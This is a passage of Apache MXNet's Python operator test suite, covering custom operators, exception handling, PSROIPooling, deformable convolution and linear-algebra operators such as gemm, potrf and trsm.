if in_stype[0] == 'default':
return ['default'], ['default'], ['default'], ['default'], ['default']
return ['default'], ['csr'], ['csr'], ['csr'], ['csr']
def create_operator(self, ctx, shapes, dtypes):
return Sqr()
data = mx.symbol.Variable('data')
aux = mx.symbol.Variable('aux')
op = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.cast(data, dtype='float64')
op = mx.symbol.cast(op, dtype='float32')
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.Variable('data', stype='csr')
aux = mx.symbol.Variable('aux')
op2 = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = x.tostype('csr')
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op2, [x], [aux], grad_stype_dict={"data": "csr"})
x2 = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
x2 = x2.tostype('csr')
aux2 = mx.nd.zeros_like(x2)
x2.attach_grad()
with mx.autograd.record():
output = mx.nd.Custom(x2, aux2, name='sqr', op_type='sqr')
output.backward()
expected_output = mx.nd.sparse.square(x2)
expected_grad = 2 * x2
rtol = 1e-4
atol = 1e-6
assert_almost_equal(output.asnumpy(), expected_output.asnumpy(), rtol=rtol, atol=atol)
assert_almost_equal(x2.grad.asnumpy(), expected_grad.asnumpy(), rtol=rtol, atol=atol)
# test for backward compatibility, i.e. the correctness of default implementation of
# infer storage in custom operator
class Mult(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult")
class MultProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return Mult()
lhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
rhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
lhs.attach_grad()
rhs.attach_grad()
with mx.autograd.record():
y = mx.nd.Custom(lhs, rhs, name='mult', op_type='mult')
y.backward()
assert_almost_equal(rhs.asnumpy(), lhs.grad.asnumpy(), rtol=rtol, atol=atol)
assert_almost_equal(lhs.asnumpy(), rhs.grad.asnumpy(), rtol=rtol, atol=atol)
class MultNoGrad(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult_no_grad")
class MultNoGradProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultNoGradProp, self).__init__(need_top_grad=False)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return MultNoGrad()
def infer_storage_type_backward(self, ograd_stype, in_stype, out_stype, igrad_stype, aux_stype):
return ograd_stype, in_stype, out_stype, igrad_stype, aux_stype
with mx.autograd.record():
y2 = mx.nd.Custom(lhs, rhs, name="mult_no_grad", op_type="mult_no_grad")
y2.backward()
assert_almost_equal(rhs.asnumpy(), lhs.grad.asnumpy(), rtol=rtol, atol=atol)
assert_almost_equal(lhs.asnumpy(), rhs.grad.asnumpy(), rtol=rtol, atol=atol)
class NoInputOp(mx.operator.CustomOp):
def __init__(self, length, depth):
super(NoInputOp, self).__init__()
self.output = np.ones(shape=(length, depth), dtype=np.float32)
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], self.output)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register("no_input_op")
class NoInputOpProp(mx.operator.CustomOpProp):
def __init__(self, length, depth):
super(NoInputOpProp, self).__init__()
self.length = int(length)
self.depth = int(depth)
def list_arguments(self):
return []
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return [], [(self.length, self.depth)], []
def infer_type(self, in_type):
return [], [np.float32], []
def create_operator(self, ctx, shapes, dtypes):
return NoInputOp(length=self.length, depth=self.depth)
with mx.autograd.record():
x = mx.nd.Custom(length=10, depth=10, op_type="no_input_op")
assert_almost_equal(x.asnumpy(), np.ones(shape=(10, 10), dtype=np.float32))
@with_seed()
def test_custom_op_fork():
# test custom operator fork
# see https://github.com/apache/incubator-mxnet/issues/14396
class AdditionOP(mx.operator.CustomOp):
def __init__(self):
super(AdditionOP, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
out_data[0][:] = in_data[0] + in_data[1]
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
in_grad[0][:] = out_grad[0]
in_grad[1][:] = out_grad[0]
@mx.operator.register("AdditionOP")
class AdditionOPProp(mx.operator.CustomOpProp):
def __init__(self):
super(AdditionOPProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]]
def create_operator(self, ctx, shapes, dtypes):
return AdditionOP()
if not sys.platform.startswith('win'): # no fork in windows
def custom_add():
a = mx.nd.array([1, 2, 3])
b = mx.nd.array([4, 5, 6])
c = mx.nd.Custom(a, b, op_type='AdditionOP')
assert_almost_equal((a + b).asnumpy(), c.asnumpy())
custom_add()
from multiprocessing import Process
p = Process(target=custom_add)
p.daemon = True
p.start()
p.join(5)
assert not p.is_alive() and p.exitcode == 0
def _build_dot_custom(fun_forward, name):
class Dot(mx.operator.CustomOp):
def __init__(self):
super(Dot, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
fun_forward(in_data, out_data)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register(name)
class DotProp(mx.operator.CustomOpProp):
def __init__(self):
super(DotProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [(in_shape[0][0], in_shape[1][1])]
def create_operator(self, ctx, shapes, dtypes):
return Dot()
@with_seed()
def test_custom_op_exc():
# test except handling
# see https://github.com/apache/incubator-mxnet/pull/14693
# 1. error in python code
def custom_exc1():
def f(in_data, out_data):
assert False
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot1')
a = mx.nd.zeros((4, 1))
b = mx.nd.zeros((1, 4))
c = mx.nd.Custom(a, b, op_type='Dot1')
c.wait_to_read()
assert_raises(MXNetError, custom_exc1)
# 2. error in pushing operator to engine
def custom_exc2():
def f(in_data, out_data):
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot2')
a = mx.nd.zeros((4, 2))
b = mx.nd.zeros((1, 4))
# trigger error by invalid input shapes of operands
c = mx.nd.Custom(a, b, op_type='Dot2')
c.wait_to_read()
assert_raises(MXNetError, custom_exc2)
# 3. error in real execution
if default_context().device_type == 'cpu':
def custom_exc3():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# input to Cholesky factorization should be
# symmetric positive-definite, error will be
# triggered in op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
out_data[0].wait_to_read()
_build_dot_custom(f, 'Dot3')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot3')
c.wait_to_read()
assert_raises(MXNetError, custom_exc3)
def custom_exc4():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# input to Cholesky factorization should be
# symmetric positive-definite, error will be
# triggered in op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
_build_dot_custom(f, 'Dot4')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot4')
c.wait_to_read()
assert_raises(MXNetError, custom_exc4)
@with_seed()
def test_psroipooling():
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([168, 224], [168, 224]):
for grad_nodes in [['im_data']]:
spatial_scale = 0.0625
feat_height = np.int(image_height * spatial_scale)
feat_width = np.int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1))
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1))
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
op = mx.sym.contrib.PSROIPooling(data=im_data_var, rois=rois_data_var, spatial_scale=spatial_scale,
group_size=num_group, pooled_size=num_group,
output_dim=num_classes, name='test_op')
rtol, atol = 1e-2, 1e-3
check_numeric_gradient(op, [im_data, rois_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes)
@with_seed()
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@with_seed()
def test_deformable_convolution():
for num_batch in [1, 2]:
for num_channel_data, num_deformable_group in itertools.product([4, 8], [1, 2]):
for input_height, input_width in itertools.product([5, 6], [5, 6]):
for dilate in [(1, 1), (2, 2)]:
for grad_nodes in [['im_data'], ['offset_data'], ['weight']]:
output_height = input_height
output_width = input_width
im_data = np.random.rand(num_batch, num_channel_data, input_height, input_width)
offset_data = \
np.random.rand(num_batch, num_deformable_group * 3 * 3 * 2, output_height, output_width)\
* 0.8 + 0.1
weight = np.random.normal(0, 0.001, (num_channel_data, num_channel_data, 3, 3))
bias = np.zeros(num_channel_data)
im_data_var = mx.symbol.Variable(name="im_data")
offset_data_var = mx.symbol.Variable(name="offset_data")
weight_var = mx.symbol.Variable(name="weight")
bias_var = mx.symbol.Variable(name="bias")
op = mx.sym.contrib.DeformableConvolution(name='test_op', data=im_data_var,
offset=offset_data_var,
weight=weight_var, bias=bias_var,
num_filter=num_channel_data, pad=dilate,
kernel=(3, 3), stride=(1, 1), dilate=dilate,
num_deformable_group=num_deformable_group)
if grad_nodes[0] == 'offset_data':
# wider tolerance needed for coordinate differential
rtol, atol = 1.0, 1e-2
else:
rtol, atol = 0.05, 1e-3
# By now we only have gpu implementation
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, offset_data, weight, bias], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0))
def _validate_sample_location(input_rois, input_offset, spatial_scale, pooled_w, pooled_h, sample_per_part, part_size, output_dim, num_classes, trans_std, feat_h, feat_w):
num_rois = input_rois.shape[0]
output_offset = input_offset.copy()
# simulate deformable psroipooling forward function
for roi_idx in range(num_rois):
sub_rois = input_rois[roi_idx, :].astype(np.float32)
img_idx, x0, y0, x1, y1 = int(sub_rois[0]), sub_rois[1], sub_rois[2], sub_rois[3], sub_rois[4]
roi_start_w = round(x0) * spatial_scale - 0.5
roi_start_h = round(y0) * spatial_scale - 0.5
roi_end_w = round(x1 + 1) * spatial_scale - 0.5
roi_end_h = round(y1 + 1) * spatial_scale - 0.5
roi_w, roi_h = roi_end_w - roi_start_w, roi_end_h - roi_start_h
bin_size_w, bin_size_h = roi_w / pooled_w, roi_h / pooled_h
sub_bin_size_w, sub_bin_size_h = bin_size_w / sample_per_part, bin_size_h / sample_per_part
for c_top in range(output_dim):
channel_each_cls = output_dim / num_classes
class_id = int(c_top / channel_each_cls)
for ph in range(pooled_h):
for pw in range(pooled_w):
part_h = int(math.floor(float(ph) / pooled_h * part_size))
part_w = int(math.floor(float(pw) / pooled_w * part_size))
trans_x = input_offset[roi_idx, class_id * 2, part_h, part_w] * trans_std
trans_y = input_offset[roi_idx, class_id * 2 + 1, part_h, part_w] * trans_std
bin_h_start, bin_w_start = ph * bin_size_h + roi_start_h, pw * bin_size_w + roi_start_w
need_check = True
while need_check:
pass_check = True
for ih in range(sample_per_part):
for iw in range(sample_per_part):
h = bin_h_start + trans_y * roi_h + ih * sub_bin_size_h
w = bin_w_start + trans_x * roi_w + iw * sub_bin_size_w
if w < -0.5 or w > feat_w - 0.5 or h < -0.5 or h > feat_h - 0.5:
continue
w = min(max(w, 0.1), feat_w - 1.1)
h = min(max(h, 0.1), feat_h - 1.1)
# if the following condiiton holds, the sampling location is not differentiable
# therefore we need to re-do the sampling process
if h - math.floor(h) < 1e-3 or math.ceil(h) - h < 1e-3 or w - math.floor(w) < 1e-3 or math.ceil(w) - w < 1e-3:
trans_x, trans_y = random.random() * trans_std, random.random() * trans_std
pass_check = False
break
if not pass_check:
break
if pass_check:
output_offset[roi_idx, class_id * 2 + 1, part_h, part_w] = trans_y / trans_std
output_offset[roi_idx, class_id * 2, part_h, part_w] = trans_x / trans_std
need_check = False
return output_offset
@unittest.skip("Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/11713")
@with_seed()
def test_deformable_psroipooling():
sample_per_part = 4
trans_std = 0.1
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([160, 224], [160, 224]):
for grad_nodes in [['im_data'], ['offset_data']]:
spatial_scale = 0.0625
stride = int(1 / spatial_scale)
feat_height = np.int(image_height * spatial_scale)
feat_width = np.int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1 - 2 * stride)) + stride
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1 - 2 * stride)) + stride
offset_data = np.random.rand(num_rois, 2*num_classes, num_group, num_group)
# at certain points, the bilinear interpolation function may be non-differentiable
# to avoid this, we check whether the input locates on the valid points
offset_data = _validate_sample_location(rois_data, offset_data, spatial_scale, num_group, num_group,
sample_per_part, num_group, num_classes, num_classes, trans_std, feat_height, feat_width)
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
offset_data_var = mx.symbol.Variable(name="offset_data")
op = mx.sym.contrib.DeformablePSROIPooling(data=im_data_var, rois=rois_data_var,
trans=offset_data_var, spatial_scale=spatial_scale,
sample_per_part=4, group_size=num_group,
pooled_size=num_group, output_dim=num_classes,
trans_std=0.1, no_trans=False, name='test_op')
rtol, atol = 1e-2, 1e-3
# By now we only have gpu implementation
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, rois_data, offset_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0))
def _gemm_test_helper(dtype, grad_check, rtol_fw = 1e-7, atol_fw = 1e-9):
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
data3 = mx.symbol.Variable('data3')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
shape1 = (2, 3)
shape2 = (3, 2)
shape3 = (3, 3)
shape4 = (2, 2)
data_in1 = np.random.uniform(1, 10, shape1).astype(dtype)
data_in2 = np.random.uniform(1, 10, shape2).astype(dtype)
data_in3 = np.random.uniform(1, 10, shape3).astype(dtype)
data_in4 = np.random.uniform(1, 10, shape4).astype(dtype)
# Check all transpositions of gemm operator.
data_in1_t = np.transpose(data_in1)
data_in2_t = np.transpose(data_in2)
res_gemm = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [data_in1, data_in2, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in4])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True, transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in3])
res_gemm = 4. * np.dot(data_in1_t, data_in1) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in3])
res_gemm = 4. * np.dot(data_in1, data_in1_t) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in4])
# Check batch of gemm.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
c = rep_3x(data_in4, 2, 2)
r = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
r = rep_3x(r, 2, 2)
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [a, b, c], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b, c])
# Check for different axis that describes matrix rows.
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
c2 = np.copy(np.swapaxes(c, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = 0)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
c2 = np.copy(np.swapaxes(c, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = -3)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
# Check gemm2 operator same way as gemm.
res_gemm = 4. * np.dot(data_in1, data_in2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in1)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
res_gemm = 4. * np.dot(data_in1, data_in1_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
# Check batch of gemm2.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
r = rep_3x(4. * np.dot(data_in1, data_in2), 2, 2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [a, b], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b])
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = 0)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = -3)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
# Test gemm separately from other la-operators.
@with_seed()
def test_gemm():
_gemm_test_helper(np.float64, True)
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "0"
_gemm_test_helper(np.float32, False, rtol_fw = 1e-5, atol_fw = 1e-7)
if default_context().device_type == 'gpu':
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "1"
_gemm_test_helper(np.float32, False, rtol_fw = 2e-5, atol_fw = 2e-7)
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "0"
# Helper functions for test_laop
def _make_symm_symbol(a, ndims):
assert ndims >= 2
tr_shape = list(range(ndims))
tr_shape[-1] = ndims-2
tr_shape[-2] = ndims-1
tr_shape = tuple(tr_shape)
return 0.5 * (a + mx.sym.transpose(a, axes=tr_shape))
def _make_triangle_symm(a, ndims, m, lower, dtype=np.float32):
assert ndims >= 2
# The last two dimensions must both be m
# Create mask for lower triangle and diagonal
index = mx.sym.arange(start=0, stop=m, step=1, dtype=np.int32)
lt_mask = mx.sym.one_hot(index, depth=m, dtype=dtype)
for j in range(1, m):
part1 = mx.sym.zeros(shape=(j, m), dtype=dtype)
index = mx.sym.arange(start=0, stop=m-j, step=1, dtype=np.int32)
part2 = mx.sym.one_hot(index, depth=m, dtype=dtype)
lt_mask = lt_mask + mx.sym.concat(*[part1, part2], dim=0)
if not lower:
lt_mask = mx.sym.reshape(lt_mask, shape=(m, m))
lt_mask = mx.sym.transpose(lt_mask, axes=(1, 0))
shp = tuple([1]*(ndims-2) + [m, m])
lt_mask = mx.sym.reshape(lt_mask, shape=shp)
return mx.sym.broadcast_mul(a, lt_mask)
# @ankkhedia: Getting rid of fixed seed as flakiness could not be reproduced
# tracked at https://github.com/apache/incubator-mxnet/issues/11718
@with_seed()
def test_laop():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
data3 = mx.symbol.Variable('data3')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
for lower in [True, False]:
upper = not lower
# Tests with trivial 1x1 matrices.
shape = (4, 4, 1, 1)
data_in = np.random.uniform(1, 10, shape)
# test potrf
# Note: Have to symmetrize input, for gradient test to work
res_potrf = np.sqrt(data_in)
test_potrf = mx.sym.linalg.potrf(data1, lower=lower)
check_fw(test_potrf, [data_in], [res_potrf])
if grad_check == 1:
check_grad(test_potrf, [data_in])
# test potri
ones = mx.nd.ones(shape).asnumpy()
res_potri = np.divide(ones, data_in * data_in)
test_potri = mx.sym.linalg.potri(data1, lower=lower)
check_fw(test_potri, [data_in], [res_potri])
if grad_check == 1:
check_grad(test_potri, [data_in])
# test trsm
trian_in = data_in * 7.
test_trsm = mx.sym.linalg.trsm(data1, data2, alpha=7., lower=lower)
check_fw(test_trsm, [trian_in, data_in], [ones])
if grad_check == 1:
check_grad(test_trsm, [trian_in,data_in])
# test trmm
trian_in = np.divide(ones, trian_in)
test_trmm = mx.sym.linalg.trmm(data1, data2, alpha=7., transpose=True,
rightside=True, lower=lower)
check_fw(test_trmm, [trian_in, data_in], [ones])
if grad_check == 1:
check_grad(test_trmm, [trian_in, data_in])
# test sumlogdiag
res_sumlogdiag = np.reshape(np.log(data_in), (4, 4))
test_sumlogdiag = mx.sym.linalg.sumlogdiag(data1)
check_fw(test_sumlogdiag, [data_in], [res_sumlogdiag])
if grad_check == 1:
check_grad(test_sumlogdiag, [data_in])
# more elaborate example of Cholesky factorization
matrix = np.array([[9., 3., -6., 12.],
[3., 26., -7., -11.],
[-6., -7., 9., 7.],
[12., -11., 7., 65.]])
trian = np.array([[3., 0., 0., 0.],
[1., 5., 0., 0.],
[-2., -1., 2., 0.],
[4., -3., 6., 2.]])
pow = np.array([[2., 1., 1., 1.],
[1., 4., 1., 1.],
[1., 1., 8., 1.],
[1., 1., 1., 16.]])
inv = np.array([[8.95/3., 0.05/3., 2.65, -2.5/3.],
[0.05/3., 0.05, 0.05, 0.],
[2.65, 0.05, 2.5, -0.75],
[-2.5/3., 0., -0.75, 0.25]])
ident = np.eye(4)
low_trian = trian
if not lower:
trian = np.transpose(trian)
# test potrf
test_potrf = mx.sym.linalg.potrf(_make_symm_symbol(data1, ndims=4), lower=lower)
a = rep_3x(matrix, 4, 4)
r = rep_3x(trian, 4, 4)
check_fw(test_potrf, [a], [r])
if grad_check == 1:
check_grad(test_potrf, [a])
#test potri
data1_ltri = _make_triangle_symm(
data1, ndims=4, m=4, lower=lower, dtype=dtype)
test_potri = mx.sym.linalg.potri(data1_ltri, lower=lower)
a = rep_3x(trian, 4, 4)
r = rep_3x(inv, 4, 4)
check_fw(test_potri, [a], [r])
if grad_check == 1:
check_grad(test_potri, [a])
# test trsm
test_trsm = mx.sym.linalg.trsm(data1_ltri, data2, alpha=7., transpose=upper, lower=lower)
a = rep_3x(trian, 4, 4)
b = rep_3x(matrix, 4, 4)
r = rep_3x(7. * np.transpose(low_trian), 4, 4)
check_fw(test_trsm, [a, b], [r])
if grad_check == 1:
check_grad(test_trsm, [a, b])
test_trsm2 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-2., rightside=True, transpose=lower, lower=lower)
r = rep_3x(-2. * low_trian, 4, 4)
check_fw(test_trsm2, [a, b], [r])
if grad_check == 1:
check_grad(test_trsm2, [a, b])
test_trsm3 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=0.5, transpose=lower, lower=lower)
b = rep_3x(np.transpose(low_trian), 4, 4)
r = rep_3x(0.5 * ident, 4, 4)
check_fw(test_trsm3, [a, b], [r])
if grad_check == 1:
check_grad(test_trsm3, [a, b])
test_trsm4 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-0.5, rightside=True, transpose=upper, lower=lower)
b = rep_3x(low_trian, 4, 4)
r = rep_3x(-0.5 * ident, 4, 4)
check_fw(test_trsm4, [a, b], [r])
if grad_check == 1:
check_grad(test_trsm4, [a, b])
# test trmm
test_trmm = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=7., transpose=True, rightside=True, lower=lower)
a = rep_3x(trian, 4, 4)
b = rep_3x(matrix, 4, 4)
r = rep_3x(7. * np.dot(matrix, trian.T), 4, 4)
check_fw(test_trmm, [a, b], [r])
if grad_check == 1:
check_grad(test_trmm, [a, b])
test_trmm2 = mx.sym.linalg.trmm(data1_ltri, data2, alpha=-2., lower=lower)
r = rep_3x(-2. * np.dot(trian, matrix), 4, 4)
check_fw(test_trmm2, [a, b], [r])
if grad_check == 1:
check_grad(test_trmm2, [a, b])
test_trmm3 = mx.sym.linalg.trmm(data1_ltri, data2, rightside=True, lower=lower)
r = rep_3x(np.dot(matrix, trian), 4, 4)
check_fw(test_trmm3, [a, b], [r])
if grad_check == 1:
check_grad(test_trmm3, [a, b])
test_trmm4 = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=1.2, transpose=True, lower=lower)
r = rep_3x(1.2 * np.dot(trian.T, matrix), 4, 4)
check_fw(test_trmm4, [a, b], [r])
if grad_check == 1:
check_grad(test_trmm4, [a, b])
# test sumlogdiag
a = rep_3x(pow, 4, 4)
r = np.reshape(np.tile(10. * np.log(np.array([2.])), 3), (3,))
check_fw(test_sumlogdiag, [a], [r])
if grad_check == 1:
check_grad(test_sumlogdiag, [a])
# Tests for operators linalg.syrk, linalg.gelqf
def _gelqf_combined_symbol(a):
q, l = mx.sym.linalg.gelqf(a)
q_qt = mx.sym.linalg.syrk(q, transpose=False, alpha=1., name='Q_times_Qt')
l_q = mx.sym.linalg.trmm(l, q, alpha=1., name='L_times_Q')
return mx.sym.Group([q_qt, l_q])
# NOTE: If we leave the unused output dangling, things break if dtype=np.float64. Namely, the
# backward gradient for the unused output is of dtype np.float32 then.
# ==> Very annoying!
def _gelqf_first_output(a):
